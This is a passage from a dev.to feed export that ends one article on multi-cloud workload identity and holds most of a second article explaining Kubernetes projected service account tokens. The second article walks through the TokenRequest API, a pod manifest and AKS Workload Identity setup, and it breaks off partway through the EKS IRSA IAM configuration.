  Key Takeaways:
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Always prefer workload identity&lt;/strong&gt; over static credentials&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Use native integrations&lt;/strong&gt; when available (IRSA for EKS, Workload Identity for AKS/GKE)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Follow the principle of least privilege&lt;/strong&gt; in IAM policies with resource-specific scopes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Implement strict claim matching&lt;/strong&gt; in production (exact &lt;code&gt;sub&lt;/code&gt; and &lt;code&gt;aud&lt;/code&gt; matching)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Test thoroughly&lt;/strong&gt; before production deployment&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Monitor and audit&lt;/strong&gt; authentication patterns regularly with cloud-native logging&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Keep SDKs updated&lt;/strong&gt; for the latest security patches&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Use dedicated identity pools&lt;/strong&gt; per cluster in production&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rotate OIDC providers&lt;/strong&gt; when clusters are recreated&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Additional Resources:
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html" rel="noopener noreferrer"&gt;AWS IRSA Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://azure.github.io/azure-workload-identity/" rel="noopener noreferrer"&gt;Azure Workload Identity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/iam/docs/workload-identity-federation" rel="noopener noreferrer"&gt;GCP Workload Identity Federation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://openid.net/connect/" rel="noopener noreferrer"&gt;OIDC Specification&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;h3&gt;
  
  
  Final Cleanup
&lt;/h3&gt;

&lt;p&gt;If you're completely done with all scenarios and want to delete the Kubernetes clusters, refer to the Cluster Cleanup section in the prerequisites.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This guide was created to help platform engineers implement secure, passwordless authentication across multiple cloud providers in Kubernetes environments.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;Originally published at &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>azure</category>
      <category>aws</category>
      <category>gcp</category>
    </item>
    <item>
      <title>Understanding Kubernetes Projected Service Account Tokens</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Sun, 08 Feb 2026 12:37:45 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/understanding-kubernetes-projected-service-account-tokens-205f</link>
      <guid>https://dev.to/piyushjajoo/understanding-kubernetes-projected-service-account-tokens-205f</guid>
      <description>&lt;p&gt;Service account tokens are the cornerstone of pod authentication in Kubernetes. With the introduction of &lt;strong&gt;projected service account tokens&lt;/strong&gt;, Kubernetes has significantly improved security and flexibility in how pods authenticate to the API server and external services.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Are Projected Service Account Tokens?
&lt;/h2&gt;

&lt;p&gt;Projected service account tokens are time-bound, audience-scoped JSON Web Tokens (JWTs) that replace the legacy non-expiring service account tokens. They provide enhanced security through:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Time-bound expiration&lt;/strong&gt;: Tokens automatically expire and are rotated&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audience binding&lt;/strong&gt;: Tokens can be scoped to specific audiences&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automatic rotation&lt;/strong&gt;: The kubelet automatically refreshes tokens before expiration&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  The Problem with Legacy Service Account Tokens
&lt;/h3&gt;

&lt;p&gt;Before projected tokens, Kubernetes used &lt;strong&gt;legacy service account tokens&lt;/strong&gt; that had several security limitations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Never expire&lt;/strong&gt;: Once created, they remain valid indefinitely unless manually revoked&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No audience restriction&lt;/strong&gt;: Can be used to authenticate to any service that accepts them&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stored as Secrets&lt;/strong&gt;: Persisted in etcd, increasing the attack surface&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Broad scope&lt;/strong&gt;: If compromised, provide unrestricted access to the API server&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Manual rotation&lt;/strong&gt;: Required manual intervention to refresh or rotate&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These limitations meant that if a token was leaked or a pod was compromised, attackers could potentially maintain persistent access to your cluster. Projected tokens solve these problems by being short-lived, automatically rotated, and scoped to specific audiences.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk8udv1ba5ty47t0qowdp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk8udv1ba5ty47t0qowdp.png" alt="overview" width="800" height="527"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  How Projected Tokens Work
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Understanding the TokenRequest API
&lt;/h3&gt;

&lt;p&gt;The &lt;strong&gt;TokenRequest API&lt;/strong&gt; is a Kubernetes API (not provided by cloud providers) that generates service account tokens on-demand. It's part of the core Kubernetes API server; it was introduced as beta in Kubernetes 1.12, the projected-volume feature (&lt;code&gt;TokenRequestProjection&lt;/code&gt;) went stable in 1.20, and the TokenRequest API itself graduated to stable in 1.22.&lt;/p&gt;

&lt;p&gt;Key characteristics:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Endpoint&lt;/strong&gt;: &lt;code&gt;/api/v1/namespaces/{namespace}/serviceaccounts/{name}/token&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Purpose&lt;/strong&gt;: Creates short-lived, audience-bound tokens for service accounts&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Parameters&lt;/strong&gt;: Accepts expiration time and audience claims&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Signature&lt;/strong&gt;: Tokens are signed by the Kubernetes API server's private key&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When you use a projected volume, the kubelet automatically calls this API on your behalf to request tokens, eliminating the need for manual token management.&lt;/p&gt;
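&lt;p&gt;If you need a token outside of a projected volume, you can call the same API yourself; &lt;code&gt;kubectl create token my-service-account --audience my-app --duration 1h&lt;/code&gt; is the CLI equivalent. The sketch below builds the request body the kubelet POSTs (the audience and expiry values are illustrative):&lt;/p&gt;

```python
import json

def token_request_body(audiences, expiration_seconds=3600):
    """Body POSTed to /api/v1/namespaces/{ns}/serviceaccounts/{name}/token."""
    return {
        "apiVersion": "authentication.k8s.io/v1",
        "kind": "TokenRequest",
        "spec": {
            "audiences": audiences,            # who may accept this token
            "expirationSeconds": expiration_seconds,  # time-bound lifetime
        },
    }

print(json.dumps(token_request_body(["my-app"]), indent=2))
```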

&lt;h3&gt;
  
  
  What is a Projected Volume?
&lt;/h3&gt;

&lt;p&gt;A &lt;strong&gt;projected volume&lt;/strong&gt; is a special volume type in Kubernetes that can project (combine) multiple volume sources into a single directory. Think of it as a way to mount different types of data into your pod from various sources.&lt;/p&gt;

&lt;p&gt;Common sources that can be projected:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;serviceAccountToken&lt;/strong&gt;: Dynamically generated tokens via TokenRequest API&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;configMap&lt;/strong&gt;: Configuration data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;secret&lt;/strong&gt;: Sensitive data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;downwardAPI&lt;/strong&gt;: Pod metadata&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For service account tokens, projected volumes enable the kubelet to:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Request fresh tokens from the TokenRequest API&lt;/li&gt;
&lt;li&gt;Automatically refresh tokens before expiration&lt;/li&gt;
&lt;li&gt;Mount tokens as files in the pod's filesystem&lt;/li&gt;
&lt;li&gt;Handle all the complexity of token lifecycle management&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is different from the legacy approach where tokens were stored as static Secrets and mounted directly.&lt;/p&gt;

&lt;h3&gt;
  
  
  Token Generation Flow
&lt;/h3&gt;

&lt;p&gt;Projected tokens use the TokenRequest API to generate short-lived tokens on-demand. Here's the typical flow:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foo74pfipig47iy40sa78.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foo74pfipig47iy40sa78.png" alt="token generation flow" width="800" height="527"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Basic Configuration
&lt;/h2&gt;

&lt;p&gt;Here's a simple example of configuring a projected service account token:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;token-demo&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-service-account&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;nginx&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;token&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/tokens&lt;/span&gt;
      &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;token&lt;/span&gt;
    &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;token&lt;/span&gt;
          &lt;span class="na"&gt;expirationSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3600&lt;/span&gt;
          &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
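&lt;p&gt;One practical note on consuming the mounted token: the kubelet rewrites the file in place as it rotates the token (refreshing begins once roughly 80% of the token's lifetime has elapsed), so applications should re-read the file on each use rather than cache it at startup. A minimal sketch using the mount path from the spec above:&lt;/p&gt;

```python
from pathlib import Path

# mountPath + path from the pod spec above
TOKEN_PATH = Path("/var/run/secrets/tokens/token")

def current_token(path=TOKEN_PATH):
    # Re-read on every use: the kubelet rewrites this file when it rotates the token
    return Path(path).read_text().strip()
```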



&lt;h2&gt;
  
  
  Using Projected Tokens with AKS (Azure Kubernetes Service)
&lt;/h2&gt;

&lt;p&gt;AKS leverages projected tokens for &lt;strong&gt;Workload Identity&lt;/strong&gt;, enabling pods to authenticate to Azure services without storing credentials.&lt;/p&gt;

&lt;h3&gt;
  
  
  Azure-Side Configuration
&lt;/h3&gt;

&lt;p&gt;Before using Workload Identity in AKS, you need to set up the Azure side:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Create an Azure AD application (or Managed Identity)&lt;/span&gt;
az ad sp create-for-rbac &lt;span class="nt"&gt;--name&lt;/span&gt; &lt;span class="s2"&gt;"myapp-workload-identity"&lt;/span&gt;

&lt;span class="c"&gt;# 2. Get the application's client ID&lt;/span&gt;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;APPLICATION_CLIENT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&amp;lt;your-client-id&amp;gt;"&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create federated identity credential that trusts your AKS cluster&lt;/span&gt;
az ad app federated-credential create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APPLICATION_CLIENT_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--parameters&lt;/span&gt; &lt;span class="s1"&gt;'{
    "name": "myapp-federated-credential",
    "issuer": "https://oidc.prod-aks.azure.com/&amp;lt;tenant-id&amp;gt;/&amp;lt;cluster-oidc-issuer-id&amp;gt;/",
    "subject": "system:serviceaccount:default:workload-identity-sa",
    "audiences": ["api://AzureADTokenExchange"]
  }'&lt;/span&gt;

&lt;span class="c"&gt;# 4. Assign Azure RBAC roles to the application&lt;/span&gt;
az role assignment create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$APPLICATION_CLIENT_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt; &lt;span class="s2"&gt;"Storage Blob Data Contributor"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="s2"&gt;"/subscriptions/&amp;lt;subscription-id&amp;gt;/resourceGroups/&amp;lt;rg-name&amp;gt;/providers/Microsoft.Storage/storageAccounts/&amp;lt;storage-account&amp;gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Key Configuration Points:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Issuer&lt;/strong&gt;: Your AKS cluster's OIDC issuer URL (unique per cluster)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Subject&lt;/strong&gt;: Must match the format &lt;code&gt;system:serviceaccount:&amp;lt;namespace&amp;gt;:&amp;lt;service-account-name&amp;gt;&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audiences&lt;/strong&gt;: Must be &lt;code&gt;api://AzureADTokenExchange&lt;/code&gt; for Workload Identity&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  AKS Workload Identity Setup
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ServiceAccount&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;workload-identity-sa&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;azure.workload.identity/client-id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_AZURE_CLIENT_ID"&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-workload-identity-demo&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;azure.workload.identity/use&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;true"&lt;/span&gt;  &lt;span class="c1"&gt;# This label triggers the webhook to inject volumes&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;workload-identity-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;mcr.microsoft.com/azure-cli&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sleep"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;infinity"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="c1"&gt;# Note: The following are automatically injected by the AKS Workload Identity webhook&lt;/span&gt;
    &lt;span class="c1"&gt;# when the pod has the label "azure.workload.identity/use: true":&lt;/span&gt;
    &lt;span class="c1"&gt;# &lt;/span&gt;
    &lt;span class="c1"&gt;# Environment variables:&lt;/span&gt;
    &lt;span class="c1"&gt;# - AZURE_CLIENT_ID&lt;/span&gt;
    &lt;span class="c1"&gt;# - AZURE_TENANT_ID&lt;/span&gt;
    &lt;span class="c1"&gt;# - AZURE_FEDERATED_TOKEN_FILE&lt;/span&gt;
    &lt;span class="c1"&gt;# - AZURE_AUTHORITY_HOST&lt;/span&gt;
    &lt;span class="c1"&gt;#&lt;/span&gt;
    &lt;span class="c1"&gt;# Volume mounts:&lt;/span&gt;
    &lt;span class="c1"&gt;# - name: azure-identity-token&lt;/span&gt;
    &lt;span class="c1"&gt;#   mountPath: /var/run/secrets/azure/tokens&lt;/span&gt;
    &lt;span class="c1"&gt;#   readOnly: true&lt;/span&gt;
    &lt;span class="c1"&gt;#&lt;/span&gt;
    &lt;span class="c1"&gt;# Volumes:&lt;/span&gt;
    &lt;span class="c1"&gt;# - name: azure-identity-token&lt;/span&gt;
    &lt;span class="c1"&gt;#   projected:&lt;/span&gt;
    &lt;span class="c1"&gt;#     sources:&lt;/span&gt;
    &lt;span class="c1"&gt;#     - serviceAccountToken:&lt;/span&gt;
    &lt;span class="c1"&gt;#         path: azure-identity-token&lt;/span&gt;
    &lt;span class="c1"&gt;#         expirationSeconds: 3600&lt;/span&gt;
    &lt;span class="c1"&gt;#         audience: api://AzureADTokenExchange&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Important&lt;/strong&gt;: In practice, when using AKS Workload Identity, you typically only need to:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Annotate your service account with &lt;code&gt;azure.workload.identity/client-id&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Add the label &lt;code&gt;azure.workload.identity/use: "true"&lt;/code&gt; to your pod&lt;/li&gt;
&lt;li&gt;Reference that service account in your pod spec&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The pod spec would look like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aks-workload-identity-demo&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;azure.workload.identity/use&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;true"&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;workload-identity-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;mcr.microsoft.com/azure-cli&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sleep"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;infinity"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="c1"&gt;# Everything else is auto-injected!&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;AKS will automatically inject the environment variables, volume mounts, and projected volumes for you through its mutating admission webhook.&lt;/p&gt;
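&lt;p&gt;You can verify the injection from inside the pod. The four environment variables below are the ones the webhook adds; a small check (pass a fake mapping when running outside a pod):&lt;/p&gt;

```python
import os

INJECTED_VARS = (
    "AZURE_CLIENT_ID",
    "AZURE_TENANT_ID",
    "AZURE_FEDERATED_TOKEN_FILE",
    "AZURE_AUTHORITY_HOST",
)

def missing_injected_vars(environ=os.environ):
    """Return the webhook-injected variables that are absent or empty."""
    return [name for name in INJECTED_VARS if not environ.get(name)]

print(missing_injected_vars({"AZURE_CLIENT_ID": "abc"}))
# → ['AZURE_TENANT_ID', 'AZURE_FEDERATED_TOKEN_FILE', 'AZURE_AUTHORITY_HOST']
```

&lt;p&gt;With all four present, the &lt;code&gt;azure-identity&lt;/code&gt; SDK's &lt;code&gt;WorkloadIdentityCredential&lt;/code&gt; (or &lt;code&gt;DefaultAzureCredential&lt;/code&gt;) picks them up automatically.&lt;/p&gt;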

&lt;p&gt;&lt;strong&gt;How it works in AKS:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fumwe7phcpd6g5guol56z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fumwe7phcpd6g5guol56z.png" alt="aks" width="800" height="527"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Using Projected Tokens with EKS (Elastic Kubernetes Service)
&lt;/h2&gt;

&lt;p&gt;EKS uses projected tokens for &lt;strong&gt;IAM Roles for Service Accounts (IRSA)&lt;/strong&gt;, allowing pods to assume AWS IAM roles.&lt;/p&gt;

&lt;h3&gt;
  
  
  AWS-Side Configuration
&lt;/h3&gt;

&lt;p&gt;Before using IRSA in EKS, you need to configure AWS IAM:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Get your EKS cluster's OIDC provider URL&lt;/span&gt;
aws eks describe-cluster &lt;span class="nt"&gt;--name&lt;/span&gt; my-cluster &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"cluster.identity.oidc.issuer"&lt;/span&gt; &lt;span class="nt"&gt;--output&lt;/span&gt; text
&lt;span class="c"&gt;# Output: https://oidc.eks.us-west-2.amazonaws.com/id/EXAMPLED539D4633E53DE1B71EXAMPLE&lt;/span&gt;

&lt;span class="c"&gt;# 2. Create an IAM OIDC identity provider for your cluster&lt;/span&gt;
&lt;span class="c"&gt;# Note: If you created your cluster with eksctl or with OIDC enabled, this may already exist&lt;/span&gt;
&lt;span class="c"&gt;# You can verify with: aws iam list-open-id-connect-providers&lt;/span&gt;
eksctl utils associate-iam-oidc-provider &lt;span class="nt"&gt;--cluster&lt;/span&gt; my-cluster &lt;span class="nt"&gt;--approve&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create an IAM policy for S3 access&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; s3-policy.json &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "s3:GetObject",
        "s3:ListBucket"
      ],
      "Resource": [
        "arn:aws:s3:::my-bucket",
        "arn:aws:s3:::my-bucket/*"
      ]
    }
  ]
}
&lt;/span&gt;&lt;span class="no"&gt;EOF

